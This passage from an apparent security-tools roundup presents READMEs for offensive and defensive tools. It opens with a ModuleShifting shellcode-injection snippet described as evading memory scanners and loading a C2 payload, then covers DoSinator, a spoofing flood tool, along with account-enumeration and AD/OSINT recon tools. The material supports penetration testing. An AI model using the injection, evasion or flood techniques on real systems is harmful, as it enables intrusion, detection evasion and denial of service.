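    base = kernel32.LoadLibraryW(host_dll)                        # 1. load the hosting dll
    target = base + section_offset                                # assumed known offset of the target section
    old = wintypes.DWORD(0)
    kernel32.VirtualProtect(ctypes.c_void_p(target), len(shellcode),
                            PAGE_READWRITE, ctypes.byref(old))    # 2. section -> RW
    ctypes.memmove(target, shellcode, len(shellcode))             # 3. overwrite with shellcode
    kernel32.VirtualProtect(ctypes.c_void_p(target), len(shellcode),
                            PAGE_EXECUTE_READ, ctypes.byref(old)) # 5. section -> RX (never RWX)
    ctypes.CFUNCTYPE(None)(target)()                              # 6. execute via function pointer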

When using a PE payload, ModuleShifting will perform the following operations:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. copy the PE over the specified target point section-by-section
  4. add optional padding to better blend into false positive behaviour
  5. perform base relocation
  6. resolve imports
  7. finalize section by setting permissions to their native values (avoids the creation of RWX memory region)
  8. TLS callbacks execution
  9. Executing PE entrypoint

Why it's useful

ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and, compared to Module Stomping and Module Overloading, it is stealthier because it decreases the number of IoCs generated by the injection technique itself.

There are 3 main differences between Module Shifting and some public implementations of Module Stomping (one from Bobby Cooke and WithSecure):

  1. Padding: when writing shellcode or PE, you can use padding to better blend into common False Positive behaviour (such as third-party applications or .net dlls writing x amount of bytes over their .text section).
  2. Shellcode execution using a function pointer. This helps avoid creating a new thread or calling unusual function callbacks.
  3. Restoring the original dll content over the executed shellcode. This is a key difference.

The differences between Module Shifting and Module Overloading are the following:

  1. The PE can be written starting from a specified section instead of from the beginning of the hosting dll's PE. When the target section is chosen carefully, this can reduce the amount of IoCs generated (i.e. the PE header of the hosting dll is not overwritten, or fewer bytes are overwritten in the .text section, etc.)
  2. Padding that can be added to the PE payload itself to better blend into false positives.

Using a functionally independent shellcode payload, such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to inject locally without dynamically allocating memory and, at the moment, generates zero IoCs on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case, what enables more stealthiness in the injection is the shellcode's functional independence, so that the written malicious bytes can be restored to their original content, effectively erasing the traces of the injection.

Disclaimer

All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

Credits

This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.

Usage

ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.

  1. Clone the Pyramid repo:

git clone https://github.com/naksyn/Pyramid

  2. Generate a shellcode payload with your preferred C2 and drop it into Pyramid's Delivery_files folder. See the Caveats section for payload requirements.
  3. Modify the parameters of the moduleshifting.py script inside Pyramid's Modules folder.
  4. Start the Pyramid server: python3 pyramid.py -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server 192.168.1.2 -setcradle moduleshifting.py
  5. Execute the generated cradle code on a Python interpreter.

Caveats

To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with the AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, thus breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. The initial shellcode becomes useless once executed, and there's no reason to keep it in memory as an IoC.

A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.

Detection opportunities

Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.



KaliPackergeManager - Kali Packerge Manager

By: Zion3R


kalipm.sh is a powerful package management tool for Kali Linux that provides a user-friendly menu-based interface to simplify the installation of various packages and tools. It streamlines the process of managing software and enables users to effortlessly install packages from different categories. 


Features

  • Interactive Menu: Enjoy an intuitive and user-friendly menu-based interface for easy package selection.
  • Categorized Packages: Browse packages across multiple categories, including System, Desktop, Tools, Menu, and Others.
  • Efficient Installation: Automatically install selected packages with the help of the apt-get package manager.
  • System Updates: Keep your system up to date with the integrated update functionality.

Installation

To install KaliPM, you can simply clone the repository from GitHub:

git clone https://github.com/HalilDeniz/KaliPackergeManager.git

Usage

  1. Clone the repository or download the KaliPM.sh script.
  2. Navigate to the directory where the script is located.
  3. Make the script executable by running the following command:
    chmod +x kalipm.sh
  4. Execute the script using the following command:
    ./kalipm.sh
  5. Follow the on-screen instructions to select a category and choose the desired packages for installation.

Categories

  • System: Includes essential core items that are always included in the Kali Linux system.
  • Desktop: Offers various desktop environments and window managers to customize your Kali Linux experience.
  • Tools: Provides a wide range of specialized tools for tasks such as hardware hacking, cryptography, wireless protocols, and more.
  • Menu: Consists of packages tailored for information gathering, vulnerability assessments, web application attacks, and other specific purposes.
  • Others: Contains additional packages and resources that don't fall into the above categories.

Update

KaliPM.sh also includes an update feature to ensure your system is up to date. Simply select the "Update" option from the menu, and the script will run the necessary commands to clean, update, upgrade, and perform a full-upgrade on your system.
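
Under the hood this presumably corresponds to the usual APT maintenance commands, roughly as follows (the exact flags the script uses may differ):

sudo apt-get clean
sudo apt-get update
sudo apt-get upgrade -y
sudo apt-get full-upgrade -y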

Contributing

Contributions are welcome! To contribute to KaliPackergeManager, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about KaliPM.sh, please feel free to contact me:



VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R

VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


Features

1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.
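
Conceptually, the hash lookup works along these lines. This is a minimal sketch using the public VirusTotal v3 REST API and the requests library, not VTScanner's actual code; the API key and delay values are placeholders:

import hashlib
import time
import requests

API_KEY = "YOUR_VT_API_KEY"     # placeholder - VTScanner reads its key from config.ini
DELAY = 20                      # seconds between requests, for free-tier rate limits

def lookup(path):
    sha256 = hashlib.sha256(open(path, "rb").read()).hexdigest()
    r = requests.get("https://www.virustotal.com/api/v3/files/" + sha256,
                     headers={"x-apikey": API_KEY})
    time.sleep(DELAY)
    if r.status_code == 404:
        return None             # hash unknown to VirusTotal - file not yet scanned
    stats = r.json()["data"]["attributes"]["last_analysis_stats"]
    return stats["malicious"]   # number of engines flagging the file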

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.
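
For example, a standalone binary can presumably be built the standard PyInstaller way:

pip install pyinstaller
pyinstaller --onefile VTScanner.py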

Installation

Prerequisites

Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone https://github.com/samhaxr/VTScanner.git

Usage

To initiate VTScanner, follow these steps:

cd VTScanner
python3 VTScanner.py

Configuration

  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini

License

VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

Disclaimer

VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



DoSinator - A Powerful Denial Of Service (DoS) Testing Tool

By: Zion3R


DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats. 


Features

  • Multiple Attack Modes: DoSinator supports SYN Flood, UDP Flood, and ICMP Flood attack modes, allowing you to simulate various types of DoS attacks.
  • Customizable Parameters: Adjust the packet size, attack rate, and duration to fine-tune the intensity and duration of the attack.
  • IP Spoofing: Enable IP spoofing to mask the source IP address and enhance anonymity during the attack.
  • Multithreaded Packet Sending: Utilize multiple threads for simultaneous packet sending, maximizing the attack speed and efficiency.

Requirements

  • Python 3.x
  • scapy
  • argparse

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/DoSinator.git
  2. Navigate to the project directory:

    cd DoSinator
  3. Install the required dependencies:

    pip install -r requirements.txt

Usage

usage: dos_tool.py [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]

optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,http,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
  • target_ip: IP address of the target system.
  • target_port: Port number of the target service.
  • num_packets: Number of packets to send (default: 500).
  • packet_size: Size of each packet in bytes (default: 64).
  • attack_rate: Attack rate in packets/second (default: 10).
  • duration: Duration of the attack in seconds.
  • attack_mode: Attack mode: syn, udp, icmp, http (default: syn).
  • spoof_ip: Spoof IP address (default: None).
  • data: Custom data string to send.
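
For example, a hypothetical invocation using the options above (the target values are placeholders; only run this against systems you own or are explicitly authorized to test):

python3 dos_tool.py -t 192.168.1.10 -p 80 -am syn -np 1000 -d 30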

Disclaimer

The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.

By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.

Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.

Contributing

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

Contact

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:



Associated-Threat-Analyzer - Detects Malicious IPv4 Addresses And Domain Names Associated With Your Web Application Using Local Malicious Domain And IPv4 Lists

By: Zion3R


Associated-Threat-Analyzer detects malicious IPv4 addresses and domain names associated with your web application using local malicious domain and IPv4 lists.


Installation

From Git

git clone https://github.com/OsmanKandemir/associated-threat-analyzer.git
cd associated-threat-analyzer && pip3 install -r requirements.txt
python3 analyzer.py -d target-web.com

From Dockerfile

You can run this application in a container after building the Dockerfile.

Warning: If you want to run a Docker container, Associated-Threat-Analyzer recommends using your own malicious IP and domain lists, because the maintainer may not keep the default lists on the Docker image up to date.
docker build -t osmankandemir/threatanalyzer .
docker run osmankandemir/threatanalyzer -d target-web.com

From DockerHub

docker pull osmankandemir/threatanalyzer
docker run osmankandemir/threatanalyzer -d target-web.com

Usage

-d DOMAIN , --domain DOMAIN Input Target. --domain target-web1.com
-t DOMAINSFILE, --DomainsFile Malicious Domains List to Compare. -t SampleMaliciousDomains.txt
-i IPSFILE, --IPsFile Malicious IPs List to Compare. -i SampleMaliciousIPs.txt
-o JSON, --json JSON JSON output. --json
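
For example, combining these options (assuming the sample list files shipped with the repository):

python3 analyzer.py -d target-web.com -t SampleMaliciousDomains.txt -i SampleMaliciousIPs.txt --json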

DONE

  • First-level depth scan of your domain address.

TODO list

  • Third-level or deeper static-file scanning of the target web application.
Another linked GitHub project you can take a look at: after Indicator-Intelligence v1.1.1 collects static files, it finds related domains and IPv4 addresses for threat intelligence.

https://github.com/OsmanKandemir/indicator-intelligence

Default Malicious IPs and Domains Sources

https://github.com/stamparm/blackbook

https://github.com/stamparm/ipsum

Development and Contribution

See; CONTRIBUTING.md



Tiny_Tracer - A Pin Tool For Tracing API Calls Etc

By: Zion3R


A Pin Tool for tracing:


Bypasses the anti-tracing check based on RDTSC.

Generates a report in a .tag format (which can be loaded into other analysis tools):

RVA;traced event

i.e.

345c2;section: .text
58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
...

How to build

On Windows

To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.28.
Clone this repo into \source\tools that is inside your Pin root directory. Open the project in Visual Studio and build. Detailed description available here.
To build with Intel Pin < 3.26 on Windows, use the appropriate legacy Visual Studio project.

On Linux

For now the support for Linux is experimental. Yet it is possible to build and use Tiny Tracer on Linux as well. Please refer to tiny_runner.sh for more information. Detailed description available here.

Usage

You will find details about the usage on the project's Wiki.

WARNINGS

  • In order for Pin to work correctly, Kernel Debugging must be DISABLED.
  • In install32_64 you can find a utility that checks if Kernel Debugger is disabled (kdb_check.exe, source), and it is used by the Tiny Tracer's .bat scripts. This utility sometimes gets flagged as malware by Windows Defender (it is a known false positive). If you encounter this issue, you may need to exclude the installation directory from Windows Defender scans.
  • Since version 3.20, Pin has dropped support for old versions of Windows. If you need to use the tool on Windows < 8, try compiling it with Pin 3.19.


Questions? Ideas? Join Discussions!



Holehe - Tool To Check If The Mail Is Used On Different Sites Like Twitter, Instagram And Will Retrieve Information On Sites With The Forgotten Password Function

By: Zion3R

Holehe Online Version

Summary

Efficiently finding registered accounts from emails.

Holehe checks if an email is attached to an account on sites like twitter, instagram, imgur and more than 120 others.


Installation

With PyPI

pip3 install holehe

With Github

git clone https://github.com/megadose/holehe.git
cd holehe/
python3 setup.py install

Quick Start

Holehe can be run from the CLI and rapidly embedded within existing python applications.

 CLI Example

holehe test@gmail.com

 Python Example

import trio
import httpx

from holehe.modules.social_media.snapchat import snapchat


async def main():
    email = "test@gmail.com"
    out = []
    client = httpx.AsyncClient()

    await snapchat(email, client, out)

    print(out)
    await client.aclose()

trio.run(main)

Module Output

For each module, data is returned in a standard dictionary with the following JSON-equivalent format:

{
    "name": "example",
    "rateLimit": false,
    "exists": true,
    "emailrecovery": "ex****e@gmail.com",
    "phoneNumber": "0*******78",
    "others": null
}
  • rateLimit: Lets you know if you've been rate-limited.
  • exists: If an account exists for the email on that service.
  • emailrecovery: Sometimes partially obfuscated recovery emails are returned.
  • phoneNumber: Sometimes partially obfuscated recovery phone numbers are returned.
  • others: Any extra info.

Rate limit? Change your IP.

Maltego Transform : Holehe Maltego

Thank you to :

Donations

For BTC Donations : 1FHDM49QfZX6pJmhjLE5tB2K6CaTLMZpXZ

 License

GNU General Public License v3.0

Built for educational purposes only.

Modules

Name Domain Method Frequent Rate Limit
aboutme about.me register
adobe adobe.com password recovery
amazon amazon.com login
amocrm amocrm.com register
anydo any.do login
archive archive.org register
armurerieauxerre armurerie-auxerre.com register
atlassian atlassian.com register
axonaut axonaut.com register
babeshows babeshows.co.uk register
badeggsonline badeggsonline.com register
biosmods bios-mods.com register
biotechnologyforums biotechnologyforums.com register
bitmoji bitmoji.com login
blablacar blablacar.com register
blackworldforum blackworldforum.com register
blip blip.fm register
blitzortung forum.blitzortung.org register
bluegrassrivals bluegrassrivals.com register
bodybuilding bodybuilding.com register
buymeacoffee buymeacoffee.com register
cambridgemt discussion.cambridge-mt.com register
caringbridge caringbridge.org register
chinaphonearena chinaphonearena.com register
clashfarmer clashfarmer.com register
codecademy codecademy.com register
codeigniter forum.codeigniter.com register
codepen codepen.io register
coroflot coroflot.com register
cpaelites cpaelites.com register
cpahero cpahero.com register
cracked_to cracked.to register
crevado crevado.com register
deliveroo deliveroo.com register
demonforums demonforums.net register
devrant devrant.com register
diigo diigo.com register
discord discord.com register
docker docker.com register
dominosfr dominos.fr register
ebay ebay.com login
ello ello.co register
envato envato.com register
eventbrite eventbrite.com login
evernote evernote.com login
fanpop fanpop.com register
firefox firefox.com register
flickr flickr.com login
freelancer freelancer.com register
freiberg drachenhort.user.stunet.tu-freiberg.de register
garmin garmin.com register
github github.com register
google google.com register
gravatar gravatar.com other
hubspot hubspot.com login
imgur imgur.com register
insightly insightly.com login
instagram instagram.com register
issuu issuu.com register
koditv forum.kodi.tv register
komoot komoot.com register
laposte laposte.fr register
lastfm last.fm register
lastpass lastpass.com register
mail_ru mail.ru password recovery
mybb community.mybb.com register
myspace myspace.com register
nattyornot nattyornotforum.nattyornot.com register
naturabuy naturabuy.fr register
ndemiccreations forum.ndemiccreations.com register
nextpvr forums.nextpvr.com register
nike nike.com register
nimble nimble.com register
nocrm nocrm.io register
nutshell nutshell.com register
odnoklassniki ok.ru password recovery
office365 office365.com other
onlinesequencer onlinesequencer.net register
parler parler.com login
patreon patreon.com login
pinterest pinterest.com register
pipedrive pipedrive.com register
plurk plurk.com register
pornhub pornhub.com register
protonmail protonmail.ch other
quora quora.com register
rambler rambler.ru register
redtube redtube.com register
replit replit.com register
rocketreach rocketreach.co register
samsung samsung.com register
seoclerks seoclerks.com register
sevencups 7cups.com register
smule smule.com register
snapchat snapchat.com login
soundcloud soundcloud.com register
sporcle sporcle.com register
spotify spotify.com register
strava strava.com register
taringa taringa.net register
teamleader teamleader.com register
teamtreehouse teamtreehouse.com register
tellonym tellonym.me register
thecardboard thecardboard.org register
therianguide forums.therian-guide.com register
thevapingforum thevapingforum.com register
tumblr tumblr.com register
tunefind tunefind.com register
twitter twitter.com register
venmo venmo.com register
vivino vivino.com register
voxmedia voxmedia.com register
vrbo vrbo.com register
vsco vsco.co register
wattpad wattpad.com register
wordpress wordpress login
xing xing.com register
xnxx xnxx.com register
xvideos xvideos.com register
yahoo yahoo.com login
zoho zoho.com login


AD_Enumeration_Hunt - Collection Of PowerShell Scripts And Commands That Can Be Used For Active Directory (AD) Penetration Testing And Security Assessment

By: Zion3R


Description

Welcome to the AD Pentesting Toolkit! This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment. The scripts cover various aspects of AD enumeration, user and group management, computer enumeration, network and security analysis, and more.

The toolkit is intended for use by penetration testers, red teamers, and security professionals who want to test and assess the security of Active Directory environments. Please ensure that you have proper authorization and permission before using these scripts in any production environment.

Everyone is looking at what you are looking at; But can everyone see what he can see? You are the only difference between them… By Mevlânâ Celâleddîn-i Rûmî


Features

  • Enumerate and gather information about AD domains, users, groups, and computers.
  • Check trust relationships between domains.
  • List all objects inside a specific Organizational Unit (OU).
  • Retrieve information about the currently logged-in user.
  • Perform various operations related to local users and groups.
  • Configure firewall rules and enable Remote Desktop (RDP).
  • Connect to remote machines using RDP.
  • Gather network and security information.
  • Check Windows Defender status and exclusions configured via GPO.
  • ...and more!

Usage

  1. Clone the repository or download the scripts as needed.
  2. Run the PowerShell script using the appropriate PowerShell environment.
  3. Follow the on-screen prompts to provide domain, username, and password when required.
  4. Enjoy exploring the AD Pentesting Toolkit and use the scripts responsibly!

Disclaimer

The AD Pentesting Toolkit is for educational and testing purposes only. The authors and contributors are not responsible for any misuse or damage caused by the use of these scripts. Always ensure that you have proper authorization and permission before performing any penetration testing or security assessment activities on any system or network.

License

This project is licensed under the MIT License. The Mewtwo ASCII art is the property of Alperen Ugurlu. All rights reserved.

Cyber Security Consultant

Alperen Ugurlu



Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

By: Zion3R


xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.


Features

  • Fetches domains from curated passive sources to maximize results.

  • Supports stdin and stdout for easy integration into workflows.

  • Cross-Platform (Windows, Linux & macOS).

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xsubfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this one-liner

curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xsubfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xsubfind3r.git 
  • Build the utility

     cd xsubfind3r/cmd/xsubfind3r && \
    go build .
  • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work; URLScan supports an API key, but it is not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - which uses the YAML format. Multiple API keys can be specified for each of these sources, and one of them will be used.

Example config.yaml:

version: 0.3.0
sources:
- alienvault
- anubis
- bevigil
- chaos
- commoncrawl
- crtsh
- fullhunt
- github
- hackertarget
- intelx
- shodan
- urlscan
- wayback
keys:
  bevigil:
    - awA5nvpKU3N8ygkZ
  chaos:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
  fullhunt:
    - 0d9652ce-516c-4315-b589-9b241ee6dc24
  github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
  intelx:
    - 2.intelx.io:00000000-0000-0000-0000-000000000000
  shodan:
    - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
  urlscan:
    - d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xsubfind3r use the -h flag:

xsubfind3r -h

help message:


_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

USAGE:
xsubfind3r [OPTIONS]

INPUT:
-d, --domain string[] target domains
-l, --list string target domains' list file path

SOURCES:
--sources bool list supported sources
-u, --sources-to-use string[] comma(,) separeted sources to use
-e, --sources-to-exclude string[] comma(,) separeted sources to exclude

OPTIMIZATION:
-t, --threads int number of threads (default: 50)

OUTPUT:
--no-color bool disable colored output
-o, --output string output subdomains' file path
-O, --output-directory string output subdomains' directory path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)

Contribution

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



Bryobio - NETWORK Pcap File Analysis

By: Zion3R


A network pcap file analysis tool, developed to speed up the processes of SOC analysts during analysis.


Tested

OK Debian
OK Ubuntu

Requirements

$ pip install pyshark
$ pip install dpkt

$ Wireshark
$ Tshark
$ Mergecap
$ Ngrep

INSTALLATION INSTRUCTIONS

$ git clone https://github.com/emrekybs/Bryobio.git
$ cd Bryobio
$ chmod +x bryobio.py

$ python3 bryobio.py



Redeye - A Tool Intended To Help You Manage Your Data During A Pentest Operation

By: Zion3R


This project was built by pentesters for pentesters. Redeye is a tool intended to help you manage your data during a pentest operation in the most efficient and organized way.


The Developers

Daniel Arad - @dandan_arad && Elad Pticha - @elad_pt

Overview

The Server panel will display all added servers and basic information about each server, such as: owned users, open ports and whether it has been pwned.


After entering the server, an edit panel will appear. We can add new users found on the server, found vulnerabilities, and relevant attain and files.


The Users panel contains all found users from all servers. The users are categorized by permission level and type. Those details can be changed by hovering over the username.


Files panel will display all the files from the current pentest. A team member can upload and download those files.


Attack vector panel will display all found attack vectors with Severity/Plausibility/Risk graphs.


PreReport panel will contain all the screenshots from the current pentest.


Graph panel will contain all of the Users and Servers and the relationship between them.


APIs allow users to effortlessly retrieve data by making simple API requests.


curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/users --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/exploits --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq

Installation

Docker

Pull from GitHub container registry.

git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
docker-compose up -d

Start/Stop the container

sudo docker-compose start/stop

Save/Load Redeye

docker save ghcr.io/redeye-framework/redeye:latest neo4j:4.4.9 > Redeye.tar
docker load < Redeye.tar

GitHub container registry: https://github.com/redeye-framework/Redeye/pkgs/container/redeye

Source

git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
sudo apt install python3.8-venv
python3 -m venv RedeyeVirtualEnv
source RedeyeVirtualEnv/bin/activate
pip3 install -r requirements.txt
python3 RedDB/db.py
python3 redeye.py --safe

General

Redeye will listen on: http://0.0.0.0:8443
Default Credentials:

  • username: redeye
  • password: redeye

Neo4j will listen on: http://0.0.0.0:7474
Default Credentials:

  • username: neo4j
  • password: redeye

Special-Thanks

  • Yoav Danino for mental support and beta testing.

Credits

If you own any Code/File in Redeye that is not under MIT License please contact us at: redeye.framework@gmail.com



InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

By: Zion3R


During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him identify possible ways to get into an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and urls that will later be analyzed to extract even more valuable information.


Infohound architecture

Installation

git clone https://github.com/xampla/InfoHound.git
cd InfoHound/infohound
mv infohound_config.sample.py infohound_config.py
cd ..
docker-compose up -d

You must add API Keys inside infohound_config.py file

Default modules

InfoHound has 2 different types of modules: those which retrieve data and those which analyse it to extract more relevant information.

 Retrieval modules

Name Description
Get Whois Info Get relevant information from Whois register.
Get DNS Records This task queries the DNS.
Get Subdomains This task uses Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
Get Subdomains From URLs Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
Get URLs It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
Get Files from URLs It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar
Find Email It looks for emails using queries to Google and Bing.
Find People from Emails Once some emails have been found, it can be useful to discover the person behind them. Also, it finds usernames from those people.
Find Emails From URLs Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
Execute Dorks It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
